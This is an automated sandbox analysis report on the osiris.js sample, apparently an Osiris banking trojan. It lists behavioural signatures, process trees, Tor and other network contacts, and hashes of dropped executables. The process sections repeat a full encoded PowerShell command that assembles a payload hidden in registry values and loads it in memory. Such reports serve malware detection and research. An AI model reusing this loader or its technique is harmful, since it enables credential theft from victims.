Malware Analysis Report

2025-01-22 13:34

Sample ID 210305-32cfx2va5a
Target osiris.js
SHA256 11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4
Tags
osiris banker botnet spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4

Threat Level: Known bad

The file osiris.js was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet spyware

Osiris

Executes dropped EXE

Reads user/profile data of web browsers

Uses Tor communications

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-03-05 11:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-03-05 11:49

Reported

2021-03-05 11:51

Platform

win7v20201028

Max time kernel

123s

Max time network

11s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

Signatures

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

Network

N/A

Files

memory/1376-2-0x0000000000000000-mapping.dmp

memory/1108-3-0x0000000002FB0000-0x0000000002FB4000-memory.dmp

memory/1592-4-0x0000000000000000-mapping.dmp

memory/1592-5-0x00000000760D1000-0x00000000760D3000-memory.dmp

memory/1592-6-0x0000000073E00000-0x00000000744EE000-memory.dmp

memory/1592-7-0x0000000000F40000-0x0000000000F41000-memory.dmp

memory/1592-8-0x00000000049D0000-0x00000000049D1000-memory.dmp

memory/1592-9-0x0000000004990000-0x0000000004991000-memory.dmp

memory/1592-10-0x0000000004992000-0x0000000004993000-memory.dmp

memory/1592-11-0x0000000002580000-0x0000000002581000-memory.dmp

memory/1592-12-0x0000000002750000-0x0000000002751000-memory.dmp

memory/1592-15-0x00000000056A0000-0x00000000056A1000-memory.dmp

memory/1592-20-0x00000000056F0000-0x00000000056F1000-memory.dmp

memory/1592-21-0x00000000062A0000-0x00000000062A1000-memory.dmp

memory/1592-28-0x0000000006210000-0x0000000006211000-memory.dmp

memory/1592-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-03-05 11:49

Reported

2021-03-05 11:51

Platform

win10v20201028

Max time kernel

150s

Max time network

149s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

Signatures

Osiris

banker botnet osiris

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe N/A

Reads user/profile data of web browsers

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Uses Tor communications

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3756 set thread context of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Users\Admin\AppData\Roaming\Admin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3992 wrote to memory of 196 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 3992 wrote to memory of 196 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 196 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 196 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 196 wrote to memory of 3756 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3756 wrote to memory of 2360 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 2360 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\Admin.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
PID 2360 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\Admin.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Users\Admin\AppData\Roaming\Admin.exe

"C:\Users\Admin\AppData\Roaming\Admin.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

Network

Country Destination Domain Proto
N/A 128.31.0.34:9131 128.31.0.34 tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 23.21.126.66:443 api.ipify.org tcp
N/A 31.220.3.149:80 31.220.3.149 tcp
N/A 109.248.149.169:443 tcp
N/A 8.8.8.8:53 time-a.nist.gov udp
N/A 129.6.15.28:13 time-a.nist.gov tcp
N/A 172.98.193.62:80 172.98.193.62 tcp
N/A 195.154.235.190:443 195.154.235.190 tcp
N/A 185.67.82.114:80 185.67.82.114 tcp
N/A 139.99.238.17:80 139.99.238.17 tcp
N/A 135.148.32.176:80 135.148.32.176 tcp
N/A 212.227.204.82:443 tcp
N/A 104.152.189.214:80 104.152.189.214 tcp
N/A 199.249.230.168:80 199.249.230.168 tcp
N/A 107.189.10.237:80 107.189.10.237 tcp
N/A 5.83.45.131:443 tcp
N/A 127.0.0.1:32767 tcp
N/A 87.92.222.112:80 87.92.222.112 tcp
N/A 185.220.102.244:80 185.220.102.244 tcp

Files

memory/196-3-0x0000000000000000-mapping.dmp

memory/3756-4-0x0000000000000000-mapping.dmp

memory/3756-5-0x00000000739A0000-0x000000007408E000-memory.dmp

memory/3756-6-0x0000000004D70000-0x0000000004D71000-memory.dmp

memory/3756-7-0x0000000007740000-0x0000000007741000-memory.dmp

memory/3756-8-0x0000000007100000-0x0000000007101000-memory.dmp

memory/3756-9-0x0000000007102000-0x0000000007103000-memory.dmp

memory/3756-10-0x0000000007360000-0x0000000007361000-memory.dmp

memory/3756-11-0x0000000007400000-0x0000000007401000-memory.dmp

memory/3756-12-0x0000000007470000-0x0000000007471000-memory.dmp

memory/3756-13-0x0000000007F50000-0x0000000007F51000-memory.dmp

memory/3756-14-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

memory/3756-15-0x0000000008680000-0x0000000008681000-memory.dmp

memory/3756-16-0x0000000008500000-0x0000000008501000-memory.dmp

memory/3756-17-0x00000000095C0000-0x00000000095C1000-memory.dmp

memory/3756-18-0x0000000009280000-0x0000000009281000-memory.dmp

memory/3756-19-0x00000000092E0000-0x00000000092E1000-memory.dmp

memory/3756-20-0x0000000009B60000-0x0000000009B61000-memory.dmp

memory/3756-21-0x0000000009670000-0x0000000009672000-memory.dmp

memory/3756-22-0x00000000097B0000-0x0000000009923000-memory.dmp

memory/2360-23-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2360-24-0x0000000000401698-mapping.dmp

C:\Users\Admin\AppData\Roaming\Admin.exe

MD5 4db1ee663bd9f021da04edca144f4bd7
SHA1 709d318281ceabef246af0107b1db12f237b793a
SHA256 3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512 ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

C:\Users\Admin\AppData\Roaming\Admin.exe

MD5 4db1ee663bd9f021da04edca144f4bd7
SHA1 709d318281ceabef246af0107b1db12f237b793a
SHA256 3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512 ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

memory/2360-27-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2360-28-0x0000000000530000-0x00000000005CF000-memory.dmp

memory/2476-29-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 4b669744a47d57491bafdc34594d1d83
SHA1 e59fcf8262b67b5481c8e8e182ba675a005435cc
SHA256 f2e34421ee8298153c1f03e3fa44d1c83e5ad57f3cfd3fa6f6456bbb1517deb3
SHA512 dc935a4f1bf9ea32d2c8ac9481fb9ef818b15addc02bb45e15470e30a8ed3caeb57fd233be2a0f7d152937cfb1e59461c0d178f14aacd8636a40b8fe9b97169a